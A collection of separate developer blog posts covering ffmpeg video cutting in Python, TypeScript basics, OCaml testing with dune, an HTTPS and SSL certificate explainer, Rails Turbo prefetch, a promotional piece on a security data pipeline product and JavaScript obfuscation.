esse comando eu consigo cortar os vídeos dado um início e fim e o nome de saída, agora falta integrar isso no python e tá pronto o sorvetinho certo? Não! ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/g9oeljko6rqdz4vk0bbf.gif) Detectei um problema onde há uma falha de sincronização entre o áudio e o vídeo. A faixa de áudio começava primeiro e após alguns segundos aparecia o vídeo, ouch!! Pesquisa, pesquisa e mais pesquisa. Chatgpt me explicou alguns comandos que achei na doc (a doc é bem triste de ler do ffmpeg). Vamos de teste com o novo comando: ` ffmpeg -ss 00:00:00 -t 00:00:10 -i branding.mp4 -vcodec copy -acodec copy -avoid_negative_ts make_zero potato.mp4` Agora podemos comemorar ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gpvw6pk85nze26dy0ry1.gif) Agora é juntar isso tudo no python, criar um subprocesso para chamar o ffmpeg e cortes rápidos igual aquela marca de faca (patrocina nós) . Vou utilizar a lib subprocess para abrir o processo de chamar o ffmpeg que está instalado no meu sistema operacional e aguardar até que o vídeo seja cortado. `result = subprocess.run([ 'ffmpeg', '-ss', start_time, '-t', duration, '-i', filename, '-vcodec', 'copy', '-acodec', 'copy', '-avoid_negative_ts', 'make_zero', output_filename ], capture_output=True, text=True)` O pulo do gato para retirar a falha de sincronização foi justamente adicionar o parâmetro ('-avoid_negative_ts', 'make_zero') que evita de ter timestamp negativos e com isso não gerar a falha de sync entre vídeo e aúdio. E seguimos fazendo isso para cada linha do csv que nos foi informado para processar e o resultado são vídeos cortados em até 59 segundos para serem colocados no formato vertical. Por hoje era isso, receber o csv, cortar o vídeo, lidei com a dessincronização de áudio e vídeo e exportei os vídeos para a próxima etapa que é transformá-los em formato vertical. Irei trazer o artigo de conversão desses vídeos para vertical em um futuro próximo.
thedigitalbricklayer
1,907,053
TypeScript: The Superset
TypeScript is a superset to JavaScript. This means that it is a language that includes all of the...
0
2024-07-01T01:45:29
https://dev.to/m10mo/typescript-the-superset-3b7h
TypeScript is a superset to JavaScript. This means that it is a language that includes all of the features of another language, as well as additional features. I decided to learn TypeScript because I want to leverage techniques, which will be displayed in the blog below, to enhance and improve my code. ##**Why You Should Learn TypeScript** TypeScript is a powerful, statically typed superset of JavaScript that compiles to plain JavaScript. It's designed to improve the development experience and productivity by providing features that help catch errors early and make code more maintainable. ####**What is TypeScript Used For?** TypeScript is used for developing large-scale applications, especially where maintainability and scalability are critical. It's particularly popular in enterprise environments and among developers working on complex web applications. Companies like Microsoft, Google, and Airbnb use TypeScript in their projects. ####**How Popular is TypeScript?** TypeScript has been steadily rising in popularity since its release by Microsoft in 2012. According to the Stack Overflow Developer Survey 2023, TypeScript is one of the top 10 most-loved languages, and its usage continues to grow as more developers and organizations adopt it. ##**Essential Syntax in TypeScript** TypeScript offers a range of basic data types that boost code reliability and ensure type safety. Learning how to declare and utilize these data types is crucial for having dependable TypeScript code. ####**Data Types and Variables** TypeScript supports the same primitive types as JavaScript, but it also allows you to define the types of your variables explicitly: ``` let isDone: boolean = false; let age: number = 32; let firstName: string = 'John'; let list: number[] = [1, 2, 3]; let person: [string, number] = ['John', 32]; // Tuple ``` This is called **type annotation**. ####**Code Block and Functions** TypeScript functions are similar to JavaScript functions, but you can specify the types of parameters and return values: ``` function greet(name: string): string { return `Hello, ${name}`; } ``` By specifying the types of parameters and return values, TypeScript can catch errors at compile time. For example, if you try to pass a number to the greet function, TypeScript will generate an error because name is expected to be a string. ####**Arrays and Objects** You can define arrays and objects with specific types: ``` let fruits: string[] = ['Apple', 'Banana', 'Orange']; interface Person { firstName: string; age: number; } let john: Person = { firstName: 'John', age: 32 }; ``` ##**Differences and Commonalities Between TypeScript and JavaScript** Lets look at what makes TypeScript unique to JavaScript, along with what both languages share. ####**Differences** 1. **Static Typing**: TypeScript adds optional static types to JavaScript. This means you can specify the type of a variable when you declare it, and TypeScript will check that the variable always holds a value of that type. 2. **Type Inference:** TypeScript can infer the type of a variable even if you don’t explicitly specify it. This helps catch errors early. ####**Similarities** 1. **Syntax:** TypeScript is a superset of JavaScript, so all JavaScript code is valid TypeScript code. 2. **Functions and Classes:** TypeScript supports functions and classes just like JavaScript, but with additional features for type safety. 3. **Tooling:** TypeScript integrates seamlessly with modern JavaScript tools and frameworks, such as React, Angular, and Node.js. ##**Tips for Learning TypeScript as a JavaScript Developer** Everyone's learning journey is different. Below are some tips I found helpful in my learning experience: 1. **Start with the Basics:** Begin by learning how TypeScript's type system works. Understand how to declare variables with types and how to use type annotations in functions. 2. **Gradual Adoption:** Start by adding TypeScript to a small project or convert an existing JavaScript project incrementally. This helps in understanding how TypeScript fits into your workflow without being overwhelmed. 3. **Leverage the Community:** The TypeScript community is active and supportive. Use resources like the official TypeScript documentation, Stack Overflow, and GitHub repositories to learn and troubleshoot issues. ##**Resources** [TypeScript Basics](https://www.youtube.com/watch?v=ahCwqrYpIuM) [Codecademy TypeScript Course](https://www.codecademy.com/enrolled/courses/learn-typescript) ##**Conclusion** Embracing TypeScript as a JavaScript developer unlocks new opportunities, improving your coding journey and ensuring your projects are more resilient and easier to maintain. Mastering its fundamental syntax, understanding its unique traits, and building on your JavaScript skills will make your transition to TypeScript both enriching and fulfilling.
m10mo
1,906,980
Bare-bones unit testing in OCaml with dune
THERE are various techniques and tools to do unit testing in OCaml. A small selection: Alcotest -...
0
2024-07-01T01:30:17
https://dev.to/yawaramin/bare-bones-unit-testing-in-ocaml-with-dune-1lkb
ocaml, testing
--- title: Bare-bones unit testing in OCaml with dune published: true description: tags: ocaml,testing # cover_image: https://direct_url_to_image.jpg # Use a ratio of 100:42 for best results. # published_at: 2024-06-07 04:18 +0000 --- THERE are various techniques and tools to do unit testing in OCaml. A small selection: - [Alcotest](https://github.com/mirage/alcotest/) - a colourful unit testing framework - [OUnit2](https://github.com/gildor478/ounit?tab=readme-ov-file) - an xUnit-style test framework - [ppx_expect](https://github.com/janestreet/ppx_expect) - a snapshot testing framework - [Speed](/stroiman/introducing-speed-2ofk), a new framework announced right here on dev.to, with an emphasis on a fast feedback loop. While these have various benefits, it is undeniable that they all involve using a third-party library to write the tests, learning the various assertion functions and their helpers, and learning how to read and deal with test failure outputs. I have lately been wondering if we can simplify and distill this process to its very essence. When you run a unit test, you have some expected output, some 'actual' output from the system under test, and then you compare the two. If they are the same, then the test passes, if they are different, the test fails. Ideally, you get the test failure report as an easily readable diff so you can see _exactly_ what went wrong. Of course, this is a simplified view of unit testing–there are tests that require more sophisticated checks–but for many cases, this simple approach is often 'good enough'. ## Enter dune And here is where dune, OCaml's build system, comes in. It turns out that dune ships out of the box with a ['diff-and-promote'](https://dune.readthedocs.io/en/stable/concepts/promotion.html) workflow. You can tell it to diff two files, running silently if they have the same content, or failing and printing out a diff if they don't. Then you can run a simple `dune promote` command to update the 'expected' or 'snapshot' file with the 'actual' content. Let's look at an example. ## Example project Let's set up a tiny example project to test out this workflow. Here are the files: ### dune-project ``` (lang dune 2.7) ``` This file is needed for dune to recognize a project. You can use any supported version of dune here, I just default to 2.7. ### lib/dune ``` (library (name lib)) ``` This declares a dune library inside the project. ### lib/lib.ml ```ocaml let add x y = x + y let sub x y = x - y ``` This is the implementation source code of the library. Here we are just setting up two dummy functions that we will 'test' for demonstration purposes. Of course in real-world code there will be more complex functions. ### test/test.expected.txt (This file is deliberately left empty.) ### test/test.ml ```ocaml let test msg op x y = Printf.printf "%s: %d\n\n" msg (op x y) open Lib let () = test "add 1 1" add 1 1; test "sub 1 1" sub 1 1 ``` This file defines a `test` helper function whose only job is to just print out a message and then the result of the test, together, to standard output. Then we use the helper repeatedly to test various scenarios. This has the effect that we just print out a bunch of things to standard output. ### test/dune ``` (test (name test) (libraries lib) (action (diff test.expected.txt test.actual.txt))) (rule (with-stdout-to test.actual.txt (run ./test.exe))) ``` Here is where the magic happens. It has two stanzas. Let's look at them one by one. `test` - this stanza defines the test 'component' for dune. Now dune will carry out the test when we run the `dune test` command. It says that this test depends on the `lib` library (defined earlier), and for the actual action of the test, it should diff the two given files. The first file, `test.expected.txt`, is meant to be committed into the codebase. It is initially empty, and we will update it as part of our testing workflow. `rule` - this stanza defines how to generate the second file needed by the `diff` action of the `test` stanza. It's somewhat like a makefile rule. The `with-stdout-to` field tells dune to run the `./test.exe` executable, which it knows how to get by compiling `test.ml`, and redirect the output into `test.actual.txt`. Once this is done, the `test` stanza can proceed and diff the two files. Notice that dune understands the inputs and outputs of both these stanzas, and will recompile and rerun the actions as necessary to update the files. ## First test Now let's run the initial test: ``` $ dune test File "test/test.expected.txt", line 1, characters 0-0: diff --git a/_build/default/test/test.expected.txt b/_build/default/test/test.actual.txt index e69de29..1522c5b 100644 --- a/_build/default/test/test.expected.txt +++ b/_build/default/test/test.actual.txt @@ -0,0 +1,4 @@ +add 1 1: 2 + +sub 1 1: 0 + ``` ## Promotion The diff says that the actual output content is not what we 'expected'. Of course, we deliberately started with an empty file here, so let's update the 'expected file' to match the 'actual' one: ``` $ dune promote Promoting _build/default/test/test.actual.txt to test/test.expected.txt. ``` ## Rerun test After the promotion, let's check that the test passes: ``` $ dune test $ ``` No output, meaning the test succeeded. ## Add tests Let's add a new test: ```ocaml let () = test "add 1 1" add 1 1; test "sub 1 1" sub 1 1; test "sub 1 -1" sub 1 ~-1 ``` And run it: ``` $ dune test File "test/test.expected.txt", line 1, characters 0-0: diff --git a/_build/default/test/test.expected.txt b/_build/default/test/test.actual.txt index 1522c5b..17ccf8e 100644 --- a/_build/default/test/test.expected.txt +++ b/_build/default/test/test.actual.txt @@ -2,3 +2,5 @@ add 1 1: 2 sub 1 1: 0 +sub 1 -1: 2 + ``` OK, we just need to promote it: `dune promote`. Then the next `dune test` succeeds. ## Fix a bug Let's say we introduce a bug into our implementation: ```ocaml let sub x y = x + y ``` Now let's run the tests: ``` $ dune test File "test/test.expected.txt", line 1, characters 0-0: diff --git a/_build/default/test/test.expected.txt b/_build/default/test/test.actual.txt index 17ccf8e..29adb0b 100644 --- a/_build/default/test/test.expected.txt +++ b/_build/default/test/test.actual.txt @@ -1,6 +1,6 @@ add 1 1: 2 -sub 1 1: 0 +sub 1 1: 2 -sub 1 -1: 2 +sub 1 -1: 0 ``` It gives us a diff of exactly the failing tests. Obviously, in this case we are not going to run `dune promote`. We need to fix the implementation: `let sub x y = x - y`, then rerun the test. And we see that after fixing and rerunning, `dune test` exits silently, meaning the tests are passing again. ## Discussion So...should you actually do this? Let's look at the pros and cons. ### Pros 1. No need for a third-party testing library. Dune already does the heavy lifting of running tests and diffing outputs. 1. No need to learn a set of testing APIs that someone else created. You can just write your own helpers that are custom-made for testing your libraries. All you need to do is make the output understandable and diffable. 1. Diff-and-promote workflow is really quite good, even with a bare-bones setup like this. Conventional unit test frameworks really struggle to provide diff output as good as this (Jane Street's ppx_expect is an exception which takes a hybrid approach and wants to make the workflow [a joyful experience](https://blog.janestreet.com/the-joy-of-expect-tests/)). 1. You have all expected test results in a single file for easy inspection. ### Cons 1. It's tied to dune. While dune is today and for the foreseeable future clearly the recommended build system for OCaml, not everyone is using it, and there's no guarantee that the ecosystem will stick to it in perpetuity. It's just highly likely. 1. You have to define your own output format and helpers. While usually not that big of a deal, it may still need some [thought and knowledge](/yawaramin/how-to-print-anything-in-ocaml-1hkl) to define printers for complex custom types. 1. You can't run only a subset or a single test. You have to run all tests defined in the executable test module. This is not a huge deal if tests usually run fast, but can become problematic when you have slow tests. Of course, many things become problematic when you have slow unit tests. 1. It doesn't output results in a structured format that can be processed by other tools, eg `junit.xml` that can be used by CI pipelines to report test failures, or test coverage. 1. It goes against the 'common wisdom'. People expect unit tests to use conventional-style frameworks, and can be taken aback when they don't. Overall, in my opinion this approach is fine for simple cases. If you have more complex needs, fortunately there are plenty of options for more powerful test frameworks.
yawaramin
1,907,049
This is how SSL certificates work: Https explained in 15 minutes
Video: The world of online security may seem complex, but understanding the basics of how SSL...
0
2024-07-01T01:23:39
https://dev.to/dinesh_arora_ceece3475e16/this-is-how-ssl-certificates-work-https-explained-in-15-minutes-3llj
Video: {% embed https://youtu.be/fEmQxxVqYEE %} The world of online security may seem complex, but understanding the basics of how SSL certificates work and why HTTPS is essential can empower you to make safer choices online. Just like Jane, you can navigate the digital landscape with confidence, knowing that your data is protected from prying eyes. So next time you browse the web, remember the story of Jane and the coffee shop hacker, and choose secure, trusted websites for your online activities. Let’s start our day with Jane who was enjoying her coffee peacefully. ## Chapter 1: The Coffee Shop Conundrum** It was a sunny afternoon, and Jane decided to take a break from her hectic day. She headed to her favorite coffee shop, ordered a latte, and found a cozy corner to catch up on some online shopping and emails. As she settled in, she connected her laptop to the coffee shop’s free Wi-Fi and began browsing. Little did she know, a hacker named Bob was sitting just a few tables away, eager to intercept her data. Bob had set up a fake Wi-Fi network named “Coffee_Shop_WiFi_Free” to lure unsuspecting customers. Jane, unaware of the dangers, connected to it without a second thought. Bob now had access to all the data Jane was sending and receiving — her login credentials, personal messages, and even her credit card information. ## Chapter 2: Enter HTTPS As Jane continued browsing, she noticed a small padlock icon next to the website’s address in her browser. Curious, she hovered over it, revealing the letters “HTTPS” before the web address. Jane remembered reading somewhere that HTTPS meant the website was secure, but she didn’t fully understand how it worked. HTTPS stands for Hypertext Transfer Protocol Secure. It’s an enhanced version of HTTP, the protocol used for transferring data over the web. The “S” in HTTPS stands for “Secure,” indicating that the connection between Jane’s browser and the website is encrypted. This encryption ensures that any data exchanged is unreadable to anyone who might intercept it — including Bob, the hacker. ## Chapter 3: The Magic of SSL Certificates The key to HTTPS is something called an SSL certificate. SSL stands for Secure Sockets Layer, a technology that establishes an encrypted link between a web server and a browser. This encryption is like a secret code that only Jane and the website can understand, keeping her information safe from prying eyes. But how does this magic work? Let’s delve into the mechanics. ## Chapter 4: Encryption Unveiled Encryption transforms readable data into a scrambled format that can only be deciphered with the right key. Think of it as sending a locked box with a combination lock. Only someone who knows the combination can open the box and read the contents. There are two main types of encryption used in securing data: symmetric encryption and asymmetric encryption. **Symmetric Encryption** In symmetric encryption, both parties (Jane and the website) share the same key to encrypt and decrypt data. Imagine Jane and her friend Emma have a shared secret code: they both know that “A” stands for “1”, “B” stands for “2”, and so on. If Jane sends Emma the message “HELLO” using this code, it becomes “85121215”. Emma, knowing the code, can easily translate “85121215” back to “HELLO”. This method is fast and efficient, but it has a downside: both parties must somehow share the secret key without it being intercepted by anyone else. **Asymmetric Encryption** Asymmetric encryption solves this problem by using two keys: a public key and a private key. The public key can be shared openly with anyone, while the private key is kept secret. Here’s how it works: - Jane wants to send a secure message to the website. - The website provides Jane with its public key. - Jane uses this public key to encrypt her message. - Only the website’s private key can decrypt this message. - Even if Bob intercepts the encrypted message, he can’t read it without the private key, which only the website possesses. ## Chapter 5: The Role of Certificate Authorities You might be wondering, “How can Jane be sure that the website’s public key is genuine and not from an imposter?” This is where Certificate Authorities (CAs) come into play. A Certificate Authority is a trusted organization that verifies the identity of websites. Think of it as a digital notary that ensures the legitimacy of a website’s public key. ### How CAs Validate Certificates 1. **Request Verification:** When a website wants an SSL certificate, it sends a request to a CA. This request includes information about the website and the organization behind it. 2. **Identity Check:** The CA verifies the website’s identity. Depending on the type of SSL certificate, this verification can range from checking domain ownership to thoroughly vetting the organization’s legal and physical existence. 3. **Issuance of Certificate:** Once the CA verifies the information, it issues an SSL certificate. This certificate includes the website’s public key and the CA’s digital signature. 4. **Trusted Connection:** When Jane’s browser connects to the website, it checks the SSL certificate against a list of trusted CAs. If the certificate is valid and trusted, her browser establishes a secure, encrypted connection. ## Chapter 6: Types of SSL Certificates Not all SSL certificates are created equal. There are several types, each providing different levels of validation and security: 1. **Domain Validated (DV) Certificates:** These certificates verify that the applicant has control over the domain. They are the quickest and least expensive type of SSL certificate, suitable for personal blogs or small websites. 2. **Organization Validated (OV) Certificates:** These require the CA to verify the organization’s identity. They provide a higher level of security and trust compared to DV certificates, making them suitable for business websites. 3. **Extended Validation (EV) Certificates:** These offer the highest level of trust and security. The CA performs a thorough vetting process, and once issued, the website displays a green address bar in browsers, indicating a high level of trust. EV certificates are ideal for e-commerce sites and financial institutions. 4. **Wildcard Certificates:** These cover a domain and all its subdomains. For example, a wildcard certificate for *.example.com would cover www.example.com, blog.example.com, and any other subdomains. 5. **Multi-Domain (SAN) Certificates:** These can cover multiple domains and subdomains with a single certificate, offering flexibility for websites with various domains. ## Chapter 7: Jane’s Enlightenment As Jane continued reading, she began to understand the importance of SSL certificates and HTTPS. They not only protected her sensitive data from hackers like Bob but also built trust and confidence in the websites she visited. Websites with HTTPS are more trustworthy because they have gone through the process of obtaining an SSL certificate from a trusted CA. Jane realized that using HTTPS was crucial for several reasons: - **Security:** SSL certificates protect sensitive data such as passwords, credit card numbers, and personal information by encrypting it. - **Trust:** Websites with HTTPS are seen as more legitimate and trustworthy by users. SEO Benefits__: Search engines like Google prioritize HTTPS websites, improving their search ranking. - **Compliance:** Many regulatory standards require the use of HTTPS to protect user data. ## Chapter 8: Jane’s Secure Browsing Journey Feeling more informed and secure, Jane made a mental note to always look for the padlock icon and “HTTPS” in the web address before entering any personal information online. She understood that while HTTPS and SSL certificates didn’t make her completely immune to all cyber threats, they provided a significant layer of protection against common attacks. As she left the coffee shop, Jane smiled, knowing that she had taken an essential step towards safeguarding her online presence. She even shared her newfound knowledge with friends and family, helping them understand the importance of secure browsing. ## Chapter 9: The Future of Online Security The internet is continuously evolving, and so are the threats that come with it. As technology advances, so do the methods to protect data. SSL has already evolved into TLS (Transport Layer Security), offering more robust encryption and security features. In the future, we can expect even more advanced security protocols and methods to protect our online data. However, the fundamental principles of encryption, authentication, and data integrity will remain at the core of online security. ## - Chapter 10: A Call to Action For anyone reading this story, it’s essential to take the following steps to ensure your online security: - Always look for the padlock icon and “HTTPS” in the web address bar before entering any personal information. - Be cautious when connecting to public Wi-Fi networks, as they can be hotspots for hackers. - Use strong, unique passwords for different websites and consider using a password manager. - Keep your software and browsers updated to protect against the latest security vulnerabilities. - Educate yourself and others about online security practices. By taking these steps, you can significantly reduce the risk of falling victim to online threats and ensure a safer browsing experience for yourself and those around you.
dinesh_arora_ceece3475e16
1,907,019
Turbo 8 InstantClick (Turbo-Prefetch) Feature
What it Does Turbo 8 introduces the InstantClick (also known as turbo-prefetch) feature,...
0
2024-07-01T01:12:58
https://dev.to/jessalejo/instantclick-turbo-prefetch-in-rails-8-a-quick-guide-2a8e
rails, turbo
## What it Does Turbo 8 introduces the InstantClick (also known as turbo-prefetch) feature, which significantly improves the perceived speed of your web application by preloading links before the user clicks on them. This feature predicts which links the user is likely to click on and preloads their content in the background. When the user actually clicks on the link, the content is loaded instantly, resulting in a faster and smoother user experience. **Demo:** 1. **Without InstantClick:** - User clicks on a link. - Browser sends a request to the server. - Server processes the request and responds with the new page. - Browser renders the new page. 1. **With InstantClick:** - User hovers over a link. - Browser prefetches the page in the background. - User clicks on the link. - Prefetched page is displayed almost instantly. ## Why Should I Use InstantClick? 1. **Enhanced User Experience:** Faster page transitions lead to a smoother and more responsive user experience. 1. **Reduced Load Time:** By prefetching pages, the perceived load time is reduced, making your application feel faster. 1. **Improved Engagement:** Users are more likely to stay on your site and navigate through multiple pages when the experience is seamless. 1. **Competitive Advantage:** Faster navigation can give you a competitive edge, as users tend to prefer websites that load quickly and efficiently. ## How to Use InstantClick The Turbo-prefetch feature was enabled by default starting from version 1.4.0 of the turbo-rails gem. This version includes the InstantClick feature, which automatically prefetches links to improve the perceived speed of web applications. To take advantage of this feature, ensure that you have Turbo set up in your Rails application. **Add Turbo to Your Application:** If you haven't already, add Turbo to your Gemfile: ```ruby gem 'turbo-rails' ``` **Install Turbo:** Run the following command to install Turbo: ```bash bundle install rails turbo:install ``` **Enable InstantClick:** InstantClick is enabled by default so you don't need to do anything extra. Your links will automatically use the prefetch feature. ## How to Disable InstantClick If you need to disable InstantClick for any reason, you can do so by modifying the Turbo configuration. 1. **Disable Globally:** To disable the InstantClick feature globally without disabling the entire Turbo functionality, you can add a meta tag in your application layout. ```html <!DOCTYPE html> <html> <head> <meta name="turbo-prefetch" content="false"> <!-- Other head elements --> </head> <body> <!-- Body content --> </body> </html> ``` 1. **Disable for Specific Links:** To disable InstantClick for specific links, add the `data-turbo-prefetch` attribute to the link tag. ```erb <%= link_to "My Link", my_path, data: { turbo_prefetch: false } %> ``` ## Conclusion Turbo 8's InstantClick feature is a powerful tool to enhance the performance and user experience of your web application. By preloading links, it significantly reduces the perceived load time, making your application feel faster and more responsive. However, you also have the flexibility to disable this feature globally or on specific links as needed. Incorporating turbo-prefetch effectively can lead to higher user engagement, better SEO, and an overall smoother experience for your users.
jessalejo
1,907,018
The Modern SOC Platform
Introduction On April 24, 2024, Francis Odum, released his research report titled, “The Evolution of...
0
2024-07-01T01:11:36
https://dev.to/rickysarora/the-modern-soc-platform-586d
**Introduction** On April 24, 2024, Francis Odum, released his research report titled, “[The Evolution of the Modern Security Data Platform](https://softwareanalyst.substack.com/p/the-evolution-of-the-modern-security?r=414hy)” in The Software Analyst Newsletter. This report examines the evolution of modern security operations, tracing its evolution from a reactive approach to a proactive approach. It highlights the shift towards automation, threat intelligence integration, and controlling the costs of ingesting and storing data as crucial elements in enhancing cyber defense strategies. We were excited to see Observo.ai included as a key player in the emerging landscape for modern Security Operation Centers. In this article, we will highlight some of the findings of this report and share how Observo.ai is addressing some of the biggest trends in security with our [AI-Powered Telemetry Pipeline](www.observo.ai/product). Source: Francis Odum "The Evolution of the Modern Security Data Platform” **Executive Summary: The Evolution of the Modern Security Data Platform** This comprehensive research report delves into the dynamic evolution of security analysis, tracing its trajectory from conventional methods to contemporary paradigms. It explores the transition from reactive measures to proactive strategies, driven by the burgeoning complexity of digital threats and technological ecosystems. **Key Sections** Introduction to Security Analysis Evolution: A historical overview of security analysis, highlighting its origins in reactive practices like antivirus software and firewalls. It sets the stage for understanding the need for modernization in response to evolving cyber threats. Emergence of Modern Techniques: Explores the rise of advanced methodologies such as threat intelligence, machine learning, and behavioral analytics, showcasing their pivotal role in proactive threat detection and mitigation. This section discusses how these techniques augment traditional security measures. Challenges of the Digital Landscape: Examines the challenges posed by the expanding digital landscape, including the proliferation of connected devices, cloud computing, and the Internet of Things (IoT). It underscores the need for adaptable and scalable security solutions. Collaborative Paradigm: Emphasizes the importance of collaborative efforts among security analysts, developers, and stakeholders. It illustrates how cross-functional teamwork enhances the implementation of robust security measures and fosters a culture of vigilance within organizations. Continuous Adaptation in Security Practices: Stresses the necessity for security analysts to continuously adapt their strategies and tools in response to evolving threats. It advocates for staying abreast of emerging technologies and threat vectors, alongside investing in ongoing training and skill development. Future Perspectives: Envisions forthcoming advancements in security analysis driven by artificial intelligence, automation, and decentralized technologies. It also cautions against the challenges posed by increasingly sophisticated adversaries and regulatory landscapes. In conclusion, the report underscores the imperative for security analysts to evolve alongside the ever-changing threat landscape, advocating for the adoption of modern techniques and collaborative partnerships to effectively safeguard digital assets in today's dynamic cybersecurity milieu. Observo.ai has worked with several customers who are implementing a modern SOC platform like the one described in this report. They have experienced stronger security, reduced manual workarounds, and have significantly controlled costs using this approach. **Explosion in Data Volume** “Legacy SIEM costs are largely indexed to data volume - meaning, the more stuff you ingest and index, the more you linearly pay. It’s now common knowledge that enterprises are accumulating data at record-setting speeds, meaning that SIEM costs are unfortunately also growing proportionally. In response, IT and security leaders have spent much of the last few years finding clever methods and tools to pre-process, reduce, and prioritize the data that they feed into these expensive systems.” Francis Odum, “The Evolution of the Modern Security Data Platform” Observo.ai was created to combat this meteoric rise in data volume. In fact, the idea for the company came when our founders were faced with the escalating costs in their SIEM renewal contract. When the proposal from their SIEM vendor came back in eight figures, something for which they could not get the budget approved, they knew they had to come up with a better solution. The idea for Observo.ai was conceived to help organizations control the growth of this data without losing any of the important signals contained within it. In a study of enterprise log and security event data, our team concluded that as much as 80% of log and security event data has zero analytical value. Sending all of that unusable data to your SIEM is a budget killer. Observo.ai uses AI models to optimize this data in the stream before it hits the SIEM index and starts racking up numbers against your daily ingest limits. We can reduce the volume sent to your SIEM by 80% or more by summarizing normal events and separating out redundant or low-value data. **Alert Fatigue** “The primary problem has been the cost of ingesting and storing data on these platforms. Secondly, the rising volume of alerts generated from these solutions.” Francis Odum, “The Evolution of the Modern Security Data Platform” Not all alerts are created equally - but they can all clog up your security team’s inbox leaving them to wonder which alerts need attention now and which can be addressed later. Observo.ai uses machine learning to understand what is normal for each data type. The Observo.ai Sentiment Engine identifies anomalies and can assign sentiment values to events. By enriching events in the stream with positive or negative sentiment values, teams can better prioritize which alerts must be dealt with immediately. This helps teams identify and resolve critical incidents 40% faster. Helping your security teams be more productive and focus on the most meaningful alerts is all part of the modern SOC. **SIEM Vendor Lock-in** “In general, this SIEM vendor lock-in intensifies data management issues, it creates a lack of correlation among siloed sources, and necessitates data rehydration for investigations.” Francis Odum Legacy SIEM vendors are incentivized to be the single destination for security data. The more data ingested into their index, the more they can charge their customers. But modern security teams are trying to balance sharply rising data volumes and the corresponding increase in SIEM licenses and infrastructure with flat to only modestly increasing budgets. Ripping and replacing is very difficult - installing agents and collectors across thousands of endpoints, applications, databases and firewalls could take months of time and take away your team from managing daily security tasks. It’s only when the prospect of massive increases in license costs and fees for daily ingest overages become so high that security teams would actually consider a switch. Observo.ai gives you a much simpler way to balance the challenges of increasing data volumes against flat budgets. With Observo.ai, you can route security data to multiple tools, and you don’t need to recollect data in order to do so. Observo.ai takes security data in the format you have and can transform it to any schema and route it to the tools you want in the right formats. This helps you route the most important data to more expensive tools and choose less expensive tools, including new SIEMs, for other classes of data. Having multiple SIEMs doesn’t mean that you need to collect the entire data sets multiple times - by transforming the data you have, you can collect once, optimize it, store a full-fidelity copy in low-cost data lake (see below), and route relevant sections to whatever tools make the most sense. Route data where it has the most value. Because we also reduce 80% or more of the data volume, this means you don’t have to choose between analyzing only the bare minimum and all of the data that gives insights into your security stance. This flexibility allows you to onboard new data types that may have been considered too expensive to analyze in your legacy SIEM including notoriously verbose sources like Firewall Logs and VPC Flow Logs. **In-House Cloud DIY Data Lake** “Security operations teams will increasingly adopt security data lakes without needing to replace existing SIEM solutions, allowing for better cost management and scalability.” Francis Odum The vast majority of SIEM queries are performed on data generated within the last two days. Still, many organizations keep months of data in their SIEM index. This can be a huge drag on performance, and rack up large storage costs. A better practice is to create a Security Data Lake for longer-term retention. Observo.ai makes it easy to create a data lake in low-cost cloud storage like AWS S3, Azure Blob, or GCP that is fully searchable with natural language queries. We store data in highly-compressible Parquet format to further control costs. Data can be stored in an Observo.ai data lake for about 1% of the cost of storing it in the SIEM index. Observo.ai can rehydrate (send in the telemetry stream) data from the lake on-demand, transform and optimize it, and re-route to any SIEM tool in the right format for further analysis. Because of the ability to perform natural language queries on data stored in the lake, you don’t need a team of data scientists and engineers to pull the right data for an investigation. By separating the system of analysis (your SIEM) from your system of retention (Observo.ai data lake), you can reduce the total cost of operating a SIEM by 50% or more and retain data for much longer timeframes. **Rise of Data ETL** “Companies like Observo have come in as data storage and management intermediaries. They act as an intelligent policy layer, absorbing filtering, and cleansing data (logs and events) before routing them into these large SIEMs. These players integrate with various apps, data management, and storage systems by intelligently filtering and managing data flow. This reduces unnecessary data replication, and managing data storage costs.” Francis Odum As we have discussed, the rise in security data brings the risk of a corresponding rise in total SIEM costs. Security teams are being tasked with keeping their spending within tight budgets. Without tools like Observo.ai, these teams are left with mundane, manual workarounds to try to harness the value of security data. Some of these include random sampling, excluding whole classes of data, or turning off data when volumes approach daily ingest limits. All of these are time-consuming and labor-intensive and introduce blindspots into your security mission. Observo.ai summarizes and samples data based on AI-based analysis in the stream. This helps ensure all of the data that matters gets into the best tools for analysis. We can automate this process to free up your teams to address security incidents instead of spending time worrying about ingest overage fees. Observo.ai can also route data to multiple tools. Many companies are trying to wean off legacy SIEM tools or at a minimum control the growth of data ingested into them. Observo.ai gives our customers the choice to send different classes of data to a different tool and to route anomalous data to more expensive tools and more normal data to lower cost tools or to an Observo.ai Data Lake. This is a huge protection against vendor lock-in and helps teams pick their optimal mix of tools and storage options without being held hostage by incumbent vendors or budget concerns. **Conclusion** “The Evolution of the Modern Security Data Platform” raises a lot of very interesting trends and best practices for security teams to consider. Observo.ai is a key part of implementing several of these recommendations. Observo.ai is the AI-Powered Pipeline for security data. To learn more about how Observo.ai can help you achieve a more modern approach to security, schedule a demo with us. You can also read our white paper, titled “Elevating Observability: Intelligent AI-Powered Pipelines.”
rickysarora
1,907,017
Is JS obfuscation the same as JS encryption?
Is JS obfuscation the same as JS encryption? In most cases, JS obfuscation and JS encryption refer...
0
2024-07-01T00:57:05
https://dev.to/wangliwen/is-js-obfuscation-the-same-as-js-encryption-3gb4
obfuscator, javascript
Is JS obfuscation the same as JS encryption? In most cases, JS obfuscation and JS encryption refer to the same thing. Conventionally, non-English-speaking countries refer to it as JS encryption, while English-speaking countries call it obfuscation. They are actually the same. Both refer to protecting JS code, such as making variable names meaningless, encrypting strings, scrambling execution flows, and so on. The purpose is to make JS code unreadable and difficult to understand, thus preventing the code written by oneself from being used or analyzed by others. JS obfuscation and JS encryption have become a mature industry, with many popular tools, often in the form of SaaS online websites. For example, js-obfuscator, jshaman, jsjiami.online, are all professional JS obfuscation and encryption tools. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qfhrsey6m4zoc7lhailh.png) However, in JS programming, there is another type of encryption, referring to encryption algorithms, such as MD5 encryption and Base64 encoding. But they are generally referred to directly as encryption algorithms, rather than JS obfuscation or JS encryption.
wangliwen
1,906,525
shopping cart working in progress....>
python script: def main(): print("Welcome to the Shop!") # Asking for user details ...
0
2024-06-30T10:42:37
https://dev.to/venkyy8/shopping-cart-working-in-progress-5472
